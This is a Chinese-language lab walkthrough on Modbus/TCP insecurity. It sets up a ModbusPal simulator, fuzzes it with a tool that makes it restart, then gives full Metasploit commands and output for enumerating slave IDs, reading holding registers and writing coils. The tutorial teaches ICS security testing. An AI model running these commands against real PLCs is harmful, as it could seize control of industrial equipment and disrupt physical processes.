Modbus协议是一种已广泛应用于当今工业控制领域的通用通讯协议,Modbus 是MODICON公司(现为施耐德电气公司的一个品牌)最先倡导的一种软的通讯规约。
通过此协议,控制器相互之间、或控制器经由网络(如以太网)可以和其它设备之间进行通信。Modbus协议使用的是主从通讯技术,即由主设备主动查询和操作从设备。
一般将主控设备方所使用的协议称为Modbus Master,从设备方使用的协议称为Modbus Slave。在我们IT术语里,其实就是server响应请求与client发送请求,正如大家所预料的,Modbus也是一个请求/应答协议。
Modbus协议是易受中间人攻击的,在获取到明文的session之后是可以做到读写线圈操作的,而很多PLC设备其实就是通过线圈读写去执行动作,也就是说其实掌握了读写功能我们就控制了PLC设备
0x01 开启Modbus从站主机和从站服务
使用ModbusPal.jar 工具启动模拟服务:
手动添加两个从站(ID为2,4)并对其添加保持寄存器和线圈,添加结果如下图:
从站ID为2配置:
下面添加保持寄存器的数值,随意填写即可:我这里填写的是11、12、13、14、15
从站ID为4添加10个线圈,并赋值
启动服务即可RUN
0x02 Swift fuzzer模糊测试工具导致导致服务异常重启
配置被测试IP和端口:
添加用例:
点击运行发包即可:
可以看到 模拟器颜色发生变化 灰色到黄色的变化,Console日志中,设备进程关闭启动状态发生变化。
0x03 使用metasploit扫描Modbus从站中的ID
上面讲解到,modbus协议是易受中间人攻击的,在获取到明文的session之后是可以做到读写线圈操作的,而很多PLC设备其实就是通过线圈读写去执行动作,也就是说其实掌握了读写功能我们就控制了PLC设备
启动msf,查询一下Modbus相关利用脚本
modbus仿真软件的默认端口也是502,所以我们只需要设置rhosts地址以及UNIT_ID_TO ,这个参数是指读取寄存器的个数,上面也提到,最多不能超过256个,我们这里设置成10就可以,读取0-10个
可以看到,结果显示识别到了2和4号寄存器(Modbus Slave ID 2和4),我们可以继续读取该寄存器的内容
msf6 > use auxiliary/scanner/scada/modbus_findunitid
msf6 auxiliary(scanner/scada/modbus_findunitid) > set unit_id_to 10
unit_id_to => 10
msf6 auxiliary(scanner/scada/modbus_findunitid) > set rhosts 10.0.3.233
rhosts => 10.0.3.233
msf6 auxiliary(scanner/scada/modbus_findunitid) > run
[*] Running module against 10.0.3.233
[*] 10.0.3.233:502 - Received: incorrect/none data from stationID 1 (probably no t in use)
[+] 10.0.3.233:502 - Received: correct MODBUS/TCP from stationID 2
[*] 10.0.3.233:502 - Received: incorrect/none data from stationID 3 (probably not in use)
[+] 10.0.3.233:502 - Received: correct MODBUS/TCP from stationID 4
[*] 10.0.3.233:502 - Received: incorrect/none data from stationID 5 (probably not in use)
[*] 10.0.3.233:502 - Received: incorrect/none data from stationID 6 (probably not in use)
[*] 10.0.3.233:502 - Received: incorrect/none data from stationID 7 (probably not in use)
[*] 10.0.3.233:502 - Received: incorrect/none data from stationID 8 (probably not in use)
[*] 10.0.3.233:502 - Received: incorrect/none data from stationID 9 (probably not in use)
[*] 10.0.3.233:502 - Received: incorrect/none data from stationID 10 (probably not in use)
[*] Auxiliary module execution completed0x04 访问从站2的寄存器数据
从Slave2 中读取读取5个寄存器的数值
dbusclientiary(scanner/scada/modbus_findunitid) > use auxiliary/scanner/scada/mo
msf6 auxiliary(scanner/scada/modbusclient) > set data_address 0
#设置读取或修改点位的起始位,实际是从1位开始的
data_address => 0
msf6 auxiliary(scanner/scada/modbusclient) > set number 5
#设置读取或修改寄存器的长度
number => 5
msf6 auxiliary(scanner/scada/modbusclient) > set unit_number 2
#设置从站的id,这里为2
msf6 auxiliary(scanner/scada/modbusclient) > set rhosts 10.0.3.233
#设置目标主机IP
rhosts => 10.0.3.233
msf6 auxiliary(scanner/scada/modbusclient) > run
#开始攻击
[*] Running module against 10.0.3.233
[*] 10.0.3.233:502 - Sending READ HOLDING REGISTERS...
[+] 10.0.3.233:502 - 5 register values from address 0 :
[+] 10.0.3.233:502 - [11, 12, 13, 14, 15]
[*] Auxiliary module execution completed
与前期设置一致数据:
0x05 修改从站4线圈值
修改从站4线圈值从站4我只添加了线圈的值,并未添加寄存器,下面就进行修改从站4的线圈值:
sf6 auxiliary(scanner/scada/modbusclient) >
msf6 auxiliary(scanner/scada/modbusclient) > set action WRITE_COILS
action => WRITE_COILS
#切换功能为写入线圈
msf6 auxiliary(scanner/scada/modbusclient) > set number 10
number => 10
msf6 auxiliary(scanner/scada/modbusclient) > set unit_number 4
unit_number => 4
msf6 auxiliary(scanner/scada/modbusclient) > set data_address 0
data_address => 0
msf6 auxiliary(scanner/scada/modbusclient) > set data_coils 1111111111
data_coils => 1111111111
msf6 auxiliary(scanner/scada/modbusclient) > run
[*] Running module against 10.0.3.233
[*] 10.0.3.233:502 - Sending WRITE COILS...
[+] 10.0.3.233:502 - Values 1111111111 successfully written from coil address 0
[*] Auxiliary module execution completed
此时查看Modbus-server,可发现数值修改成功
